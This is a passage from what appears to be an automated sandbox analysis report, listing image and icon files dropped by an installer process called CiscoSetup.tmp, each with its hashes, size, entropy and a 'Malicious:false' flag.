                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:g/6G6GknA9Wg2A/c0glTl3clp3glfHiucV:gSuknmWg2A/qlTlslelfHiucV
                                                                                                                                      MD5:1F1425233D56C7381E8A1B9544656A3F
                                                                                                                                      SHA1:13DA3D280A4561F9018BFDF2C55396862B42C3BE
                                                                                                                                      SHA-256:FD348FEFE62E962AD34D03B3639E850AAEDCEAD2585311F8F665EFFF9319A6BA
                                                                                                                                      SHA-512:ACEC3FD68209F5AF45FC0736ECD9DB2441E69BD0A0DC43C45CEF2529BDC14B4D4A41696C0BED6E11876F066E137D29E270866FE86F3A20FC4CB9F09BA0EFE0AC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...,...(.......P.....pHYs................:iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" tiff:Orientation="1" xmp:CreateDate="2018-10-09T14:27:50-04:00" xmp:ModifyDate="2018-10-19T18:00:07-04:00" xmp:MetadataDate="2018-10-19T18:00:07-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:c52f4fb1-426f-49c5-a2f3-2e915bfa2393" xmpMM:DocumentID="xmp.did:c52f4fb1-426f-49c5-a2f3-2e915bfa2393"
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1577
                                                                                                                                      Entropy (8bit):5.942243839150427
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:HA/6I1hxWwUyl3ZknA9VYVhEfNA6h+REMmcI1VCnw7Pl3Vv7aHH3yGNbBg:g/6G6GknA9Wg26x/c0eG3tmHiGg
                                                                                                                                      MD5:8675E6CF868FCE7270D170D83CE58757
                                                                                                                                      SHA1:B08567ACEF2380521759E4A1C12B1C9FE657ABED
                                                                                                                                      SHA-256:593A68E8FC7ADF787E5728D044AC71D4A9BEC6E4A6BF15895ABC8C4869F33625
                                                                                                                                      SHA-512:6480B3304656ECA345326A96FEF93B653B9F40550E5B0D14498B2670BAFB497E78A2517911F8E791E1DEC3C9A3070CB4212DB727FBE3FC648F6100E5EF349B2F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...,...(.......P.....pHYs................:iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" tiff:Orientation="1" xmp:CreateDate="2018-10-09T14:31:46-04:00" xmp:ModifyDate="2018-10-19T17:56:14-04:00" xmp:MetadataDate="2018-10-19T17:56:14-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:1181fb18-be64-4155-ab97-06d5464c99e6" xmpMM:DocumentID="xmp.did:1181fb18-be64-4155-ab97-06d5464c99e6"
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12068
                                                                                                                                      Entropy (8bit):7.961027992023309
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:ukEiqZZQXKSmwL4v9UIqsQ8Dfn0Mv2RYkTONqT0oHrkbthyZpLpXrCAfrdag8csp:uViqZZQXKSmwL4VXJhsYOTynyZpNmAjE
                                                                                                                                      MD5:7E7FE0627B08E07FEE4ED11C41A9BA59
                                                                                                                                      SHA1:E3C6036975AD146D70AE76158EEBD3D8109B0C7F
                                                                                                                                      SHA-256:019183BF0C9A25E37A7EB74ABB3DC7848C1A729BBDA1F557E26A5322DBAF11E2
                                                                                                                                      SHA-512:30E68B932388A840F92D45AA97C3B9CC012C28F36DE93D315B107C7223DCBFBF94A54A09492E930642555828FCB3F6CA519F75BE6EA451DFF7B1D2F5B8FA2472
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2531
                                                                                                                                      Entropy (8bit):7.8827223365027725
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:PajMqdGnKe/dujhrZicEFhViZIs2sJ69y+10zTECChhrHxgpj:PaIqcnKeKZHg7by+ezTLUhrR+j
                                                                                                                                      MD5:2EA165B23D882176DAAD7C368EE24642
                                                                                                                                      SHA1:A46B746D76A41D4B322552BE4D66E9FAC66D7C19
                                                                                                                                      SHA-256:5B0F218A1EDB9CE79C15E8278557CCDB8AF44EAD52B4149CBC27DEF6FFE38619
                                                                                                                                      SHA-512:7C6C1F9FBDB726AF81551CB2CB790B847904E10AB90923A8FA43C34D617FD4A7F4B0A6FC85D327FA140D8C42197213F2A2BBB4643C16A1FC7DF17C1AF1E674FC
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.4732129504366194
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:h6QRIHYm77Z5IVpIHwuS0g72HR1K9TEYkbGg2o:iHY0TUuUSHRAQXHx
                                                                                                                                      MD5:E61CF737A35E8DB52178528A0CBFE702
                                                                                                                                      SHA1:DE0A794D67A3DEF7079CEC7C48AC580CC71A7270
                                                                                                                                      SHA-256:559C518DC1F316C4991DC95D131CAB0BDAC445B1CE41B28EC8244CDD78F8AB2F
                                                                                                                                      SHA-512:8563013E9A2B75F5EDF00D71A292634FE375D5F6670F7F303C2CAB2DC271FDFC04A760417E2D487269D26611F6D236E6164EFC3179452AB34B1D42ABC17C51B6
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):4.010961844615086
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:+9/hYGSEklnePwwDIr4LcARtTmOj/FrzFkT7goo:+9/CGShEPJcX87v
                                                                                                                                      MD5:393317DEF43F554C69A8ED63065E5BBE
                                                                                                                                      SHA1:09185B8B3C21C5CFB6661958665B6D997BF64E6F
                                                                                                                                      SHA-256:92ACFDA492B05FAA52BD32E9581F028BEE55F1C5AF617ACD8EE9E6985C9D1CBD
                                                                                                                                      SHA-512:9C7B0D37DA9080F27F0116F0C45AA5CD2D9480955433D60CCEE1555C0D930081655705C65565C7C18B766458530FA5B8DD641E7D2F8776BBB8650B7D3A95351C
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3683
                                                                                                                                      Entropy (8bit):7.90204028759812
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTuU1G4X0vy:TSDS0tKg9E05TuGG4k6
                                                                                                                                      MD5:4D8816B117672123F84ECD051877A37D
                                                                                                                                      SHA1:C9983DE5E4DD52660A109C418DBDA7B7F202E2E8
                                                                                                                                      SHA-256:3D2A9058537240F9131F6A8D083A6723A0D45E31BF2BBA4EA761DE23948C8209
                                                                                                                                      SHA-512:63395803D1BED8B33E1854D6EC5EEF2322FFE69B5150CF414692D7AE8003ABA601FB283C8CB661ED4AD633B4ACF945AADC579A84910441963F8EE801D0CEB447
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4455
                                                                                                                                      Entropy (8bit):7.908038022091361
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTIaLT1ZWqwPFR34mH:TSDS0tKg9E05TBZWqqPH
                                                                                                                                      MD5:2E3C536FBC9DDA9D0DA7DD408FA3D69B
                                                                                                                                      SHA1:4056553645ACFD51D5BB1E74623ED9938C0F5717
                                                                                                                                      SHA-256:D86F0CEDDF46C275DF0FC6CF0FE70852DD270D0BC35355CC6B30CE7DDD6EC2B7
                                                                                                                                      SHA-512:AB3237097BBA665CC1B22F4A4C280C6141E8266EA9D4A569C3B53D4401E00F4E1E0F7944A172C16CDD455AF8EAF3EAA9FC43A08EFDFE7844689BFC7B4CB870F1
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):26674
                                                                                                                                      Entropy (8bit):7.935979285003627
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:YFyemvD4Gm3D6kkgmo+C24RkZErZWiTVCbFk:YryD4G+Dcgmo+C9kZsZWpFk
                                                                                                                                      MD5:B1655EC01B232A1A42E43F950321285A
                                                                                                                                      SHA1:F34C1F228C66BF4ED1B0E9901D3284EBD7A01600
                                                                                                                                      SHA-256:9E2447F1B7B4A3404C8D3588DAB59CF51635049BE4F1FC0D1BDEE77DEFFC5B47
                                                                                                                                      SHA-512:BCC1BC2AE795109EF83422613D9B0D9FF23EA81136479748FFA7CD7FC03D527B4744833728637F7892B5F60DD476F1F32122AECCCC26DB2D6092CD2346A750BA
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):28939
                                                                                                                                      Entropy (8bit):7.960017526195935
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:OkJC2FKvbdu0G3091/3+WVlQkJyE3MNLc37Wr65:FCQmc0390W0kT8ll8
                                                                                                                                      MD5:B52EAA7318111371B2B8EF3425AD4405
                                                                                                                                      SHA1:DB16F9570B55F8045FE8354ACC853655791557AA
                                                                                                                                      SHA-256:C33C036B94E3BD83D393E552CE87784BA9F74D2B8563162024DAF7ED05E7EF6D
                                                                                                                                      SHA-512:AA98F3130A76BCD5FAF093886472F1A937E93AD0A8E83C00F9675C14C7AFC5DF903C52DE64FBAD6012F5DF54A1DB56759481BA8516C0DB0A851B6BE87FD13DFF
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):29327
                                                                                                                                      Entropy (8bit):7.967732566337996
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:kfiUT6EuEADj9MKT8NYMSNQ0Ksn1GStodN2AG1:kfTGGYRKK1GStodNw
                                                                                                                                      MD5:A0FE71E2020412BD9FFEB2712628DAD0
                                                                                                                                      SHA1:33EBF21B46A1742A46DEEE2EADB0F714B4F64959
                                                                                                                                      SHA-256:3AF5729F9A5902B409FD0D79BA1B04AF2ABDB25BCB4750F235BD61DC2EEE7C77
                                                                                                                                      SHA-512:D4886F29044F3B6A1FB900AF1973362B6822085544ED65877B2F555B360E494912AAFFDA58E49C8A91ED541F9D18482A1811C9350074797416CC8ECD06CC1863
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):31702
                                                                                                                                      Entropy (8bit):7.968827949628217
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:j9rxAm3IyJR5xmDQXMUg0HvpXOQFvgMN/2iHxr:j5X5AVUjEQ9NVRr
                                                                                                                                      MD5:D7A6605937F7BE6861ED243FEED7B2AF
                                                                                                                                      SHA1:CE9EFBCE4C470923C242615A0B53E775800BB031
                                                                                                                                      SHA-256:331F0FB3EAA0F38927DD0B350A6D92B8E18ACFDF64CBC597B470EF6E4D055C81
                                                                                                                                      SHA-512:A9C1C5503D9987245389C762ECDA0F4803BD84CC3D47534731F9194BB33DF93C7FEA6569D6E0BE03C4A59551B4F8021AA129A38FFF653FEB81B5DBF065438FCF
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):26026
                                                                                                                                      Entropy (8bit):7.927985837095832
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:TKQua9HUsr5RRxO5oEt9jwIZmYCEHme0KV:+Xa9RLxO5o29jNGEGk
                                                                                                                                      MD5:5DC7A6BEE91DE8331C802B1647F5AD10
                                                                                                                                      SHA1:D9F8150235EF917E6884AA963C292530AE7ED599
                                                                                                                                      SHA-256:4D9B3A95A941BD32E42171770195872958DB56A6C2CB6FAE664500E947911149
                                                                                                                                      SHA-512:BC32B66AD44C88DB95995B08A4A2E7D420035CC02318756AD10F854B884B613C8CEE3017E7708B7E4865B06961B7292CBD91B3091B0BC61889A71A06C5A17E98
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5803
                                                                                                                                      Entropy (8bit):7.950077949239442
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:eRHNludLinPdADSlBP/5X48lHE6uXPk1HFlQ0vmHSQON0hYRGRkA3rGWjrXM:UHNludLjM/FvhE8FlRRJG1r5jA
                                                                                                                                      MD5:1F00D2A16D3C303C76359276E6983553
                                                                                                                                      SHA1:9B58E65D2A01B1E55173370BBED7CFFB72C683D2
                                                                                                                                      SHA-256:F70F49DED3EB450D26AABC8F71AE8C1BF63D2C01A1C55C6A19E010FAD602011E
                                                                                                                                      SHA-512:C65A78144AB84A68DEFAB93704D20AB177E2BB82138FCD47171289D164F938D7D9620AEB22ABE234CDC79DE2CB28AF1A2B780845D873409DF0B89A60C34D425F
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):29723
                                                                                                                                      Entropy (8bit):7.971507308971378
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:f/oVoAjsba3qfpgr/jKyV8xonTTdZPNE/ZIeb4p82Xg:fwZ6tyHTTdERbkp8Mg
                                                                                                                                      MD5:DDF9FC987801BDE753D2C37733DE7F3D
                                                                                                                                      SHA1:BDA65E600F5EDD2889244E2C1CEAD37C1C292FC8
                                                                                                                                      SHA-256:D62A61171CAAD9B43DBCE2683DB87959B2C1FCB303D6B34A3DC1D178A9745F44
                                                                                                                                      SHA-512:D1C0451C3E9B52920A56EDF57CCF3617662E18B14E0E0B00A94D948574431C30E1C31BA2FF6F4BBFA8E01D42B00EA90FD03CD1D3991B3ACF04C5C9802F547244
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 67 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1264
                                                                                                                                      Entropy (8bit):7.787798189239225
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:GblEbksH883ZKHGbOgt1NxI7aY1nigCC2OjKe6Yt3CvPTWngq2i3sTj85:ElEJH8I/NkQgQ+KtY1C3Sngq2VW
                                                                                                                                      MD5:DB2D5090354734EC085D88810B342866
                                                                                                                                      SHA1:F727BC14361A4332C73BFB5194CA5FF6EAC37959
                                                                                                                                      SHA-256:996C1A034CC8B6CA3C511E2C7EE2FED22F31904DB769A1AD8555F1CFD478AA62
                                                                                                                                      SHA-512:04F9B9B5EABD33E318F6A83A734ECA67C2778745560F44F45C535847BF642B33DB2C6C974CC7A6AAE4C68C67470135B15ABB2A77247BFF3C518EC113FDFD8888
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):14308
                                                                                                                                      Entropy (8bit):7.981829207860698
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:XybKkbzXX5gnaVvNX5HqQiVAlwokisiMCb9sdP4++2SC7a1Rj2:XFyBr5KAworb9sB4Yi0
                                                                                                                                      MD5:1FC5657F3DDBAE57EA997277C9D6488A
                                                                                                                                      SHA1:2C4A261FEA797112FF95ABDB008435329BC8C048
                                                                                                                                      SHA-256:DC39DF1AECA15B0BAD3E15D05CE917D3CB7CB00C4F363BE67AC5741F82E5A57A
                                                                                                                                      SHA-512:CA37C34378244C91AC316717B1DFBA2E3D596918F9000710ECDF503728C2C207031F71224410CE661AADB59DB5272EF993A0826E96D311784F32BDE7BA125440
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):13810
                                                                                                                                      Entropy (8bit):7.9753795366170355
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:9UvTt4Skm1eC/3ndqwLk01JZ1GUhDYLk6pb2IloPTCDnnd:9qeSXeC/7TYpb2jSnd
                                                                                                                                      MD5:276699732D96B797E30C6092A6B9A3C8
                                                                                                                                      SHA1:9430D64617EC4CAA2895D0755824E556568FDC70
                                                                                                                                      SHA-256:217DD0FA6E750A6E5E422744ED0650204519942130254825CBE87B16E5E5AAAD
                                                                                                                                      SHA-512:884D6A9A105697FD5F4F4032FA14C967826937D42E6B88FD6D8DECC3B03AE0296588CF1D093673765C16CD65872405F52986303DF2453D50DDCA6F540082DA0E
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):10811
                                                                                                                                      Entropy (8bit):7.9725003667897125
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:xGW6GZ0zrJJ+M0jTsGzV2jysFfqybOB4twma2iNrHbC4ussE84u:xMZUTsGirFioOBg49VvusV84u
                                                                                                                                      MD5:A805DED6582E8382AB22EAF761559ED7
                                                                                                                                      SHA1:2C5C4C718AFC5566FB5D6B458CAFB04AC96B6A13
                                                                                                                                      SHA-256:393968B4F0F62527169D0D3DB56D756DE094D6F91252536BCD08770B83C98446
                                                                                                                                      SHA-512:F47219CE8D631FB79BF9FF67D24B57253A5F56E2DF98A35C5769D84A101E6E6ADA66D2B2E1FA6B1141087060200F97E48EA01B99CBE9B81FFA727E76ABA07713
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):13727
                                                                                                                                      Entropy (8bit):7.982847912604664
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:63aRGz9MobH6FYdTA1tjCtZPXq5Sc5Li2H2E:v29jH6FJ1YnyLii2E
                                                                                                                                      MD5:2DDF6BB80F9B33B219E448F37ED394C0
                                                                                                                                      SHA1:BD1D1397D9011D9CF81D1061095CEA39C81AEE56
                                                                                                                                      SHA-256:8CB70AAF7D9D0C98AF0E6C640A78A2D4CABA2DC3DA8876208AD9A617A6E7A226
                                                                                                                                      SHA-512:00E86EDC454CF26E50D8AEEDF2CBC031E79F609E280E27FA87381CE6C7F9F6A8611FFC6EB1075BE271F0E864EDAAE89FDB25502BCB34C66412B6504C370154CF
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):13633
                                                                                                                                      Entropy (8bit):7.975971786407776
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:6MOtUX/uOlpyiGD809Mt039VytL65doCQc:1NWFl809Mt0j0Lap
                                                                                                                                      MD5:9C88E64458F50120E89167040B55A41C
                                                                                                                                      SHA1:8A43DFC4B9ED2CB460A024562405302468185A09
                                                                                                                                      SHA-256:E1E3C1C59B21F0F49EC9DB747C14760EC2068394F739A2E456F20A25E40AD24D
                                                                                                                                      SHA-512:7EACCCFC904D52AA13214757309858F4083F5CD8C06D6442F3C3F361A2AD01865C4A816240F3B87B63052F33AB96EB08F0C504A1CF0110C569D64350948B3BD8
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 200 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):10710
                                                                                                                                      Entropy (8bit):7.9641316394298025
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:Aowo3FbryCXdxyG2En+b5eUJf1Q6pPZ3LxElBt/wVUuv04YKmECa:AowqbrvX3h1+b5eMdQDY3v0da
                                                                                                                                      MD5:5412237E7D26A5CB2F3F8891B9E36462
                                                                                                                                      SHA1:778ABA750AFD4D5518A5B7EDE1F73E7A016883C8
                                                                                                                                      SHA-256:288C513CA8875B4BC5DB6144D0C4215680F5BF3385DF05D6A8EC2896587DB6D3
                                                                                                                                      SHA-512:BAC0482951830571BDAF8A1FF0C23B3EB1C6AFB72C46628150EAEE2CD99167FEBE9A74DCAA2F2DAEDA5B58856BA7A9378880A7EB0B5D834D31EA91D3010B41F8
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12252
                                                                                                                                      Entropy (8bit):7.977665916091742
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:wld0FFxadXOHqBRtSDkAW0C6j7dNirKFbu+MMIxh0kOeg+Y/meTYeJlJlFrQ/:2oFxTqvt4TW56j7uraNw70kkHd/Jnk
                                                                                                                                      MD5:864800C5743CB649C4616758EA169E4F
                                                                                                                                      SHA1:3A02818977AF60D5DA37011CFC35DF11FC467906
                                                                                                                                      SHA-256:EF07FC7A9E194C9F076CF86C65E292816AAF666C00400A0BE8F70FB7740E902B
                                                                                                                                      SHA-512:ADE99880BB1B1A1FE3ED348AD625D6301FE8631E594E1CCBBE8678245F5B1EE2BBF93BEF7101698CF909E93CD4BBF005DD20466D3A278A9CACE91B324A23A48B
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12258
                                                                                                                                      Entropy (8bit):7.976396258951981
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:Fkocto5a0L5W0WyUW8l4JGfcRWyryRN77YK/CPEyei5rTiKb9bdgih7OnT:Fkocto5zW0dNaAfRxKK80dbd5hanT
                                                                                                                                      MD5:33B3721B931071C69A9ECDFDAEF39F29
                                                                                                                                      SHA1:EE4DD7077CFDA9C0A2FE594CE8C9496EF23CA2E3
                                                                                                                                      SHA-256:55FC14B826D7F3C9F47F14CDBDAE488F1D4FE3678CD95BBBF7E643436F382D37
                                                                                                                                      SHA-512:B8E1843F2F08ADF93F7277FFAF8DD5299F7F5FCFA38AD15EC54422D4E3048822E15BB9D0B682D1728B6E4064CAE32222998ED48D41310FE7D9C58116D6D9E108
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8950
                                                                                                                                      Entropy (8bit):7.969730039207073
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:p96ObyGv4LCovtazAkU/bm8oT+4UObs9KhHU1gL3c2/Rqw:tbtuCovtazCDdxObJ5UM3hh
                                                                                                                                      MD5:4F8EBA018E164B7A5FFDA205576989E8
                                                                                                                                      SHA1:56669FFFC614C2577370B0EF84EA6EA4FFE89858
                                                                                                                                      SHA-256:815EACDBC62FED323EB3D0BBAD4596C0D699862A66258A4F994B78CE520389A1
                                                                                                                                      SHA-512:F9CBDEE29FD372DEA72C6039E705A192B2C751927490B811317CE74A56DBEF1B4C17D05D1CC29A32F060C6A761D93CDB5D2AF6C76853427F5341D7C6DA4F44E7
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12436
                                                                                                                                      Entropy (8bit):7.977312501768235
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:9duiLviw1Tg2WOFeuMhEhKPewOSJKVBpFGo5cJUs1P3X3cI78saDjy6Z7KiasZM1:7vJ0OYhbPWEKLaoe9dXsI789HZTla
                                                                                                                                      MD5:3F1083A6458C2CC3E9743D03ACB0D349
                                                                                                                                      SHA1:280DA65E961DAC251D6394A234E92FB110DBC998
                                                                                                                                      SHA-256:78A87D7B4CDA2E04CF4A608C78CE627450E15CD75AE121B4D72466837197D096
                                                                                                                                      SHA-512:250604CE42BD866B870A50B01E892036364DBBBEA1AC58EF60B3E4E38513A9DADE3987459FBD83681435D74521B368550DFE329E70CDD84837BAFCD2E43B53A2
                                                                                                                                      Malicious:false
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12780
                                                                                                                                      Entropy (8bit):7.975972884511595
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:384:eS01CYt7F9/5i2XPFK02VBVDNP/RqOMGkw9j:e1th95PqjP/E1A
                                                                                                                                      MD5:1CE2626120CD6B69683255C71552896B
                                                                                                                                      SHA1:4230DF12A00E6B13CAB39EFB1C44DCBF5B656087
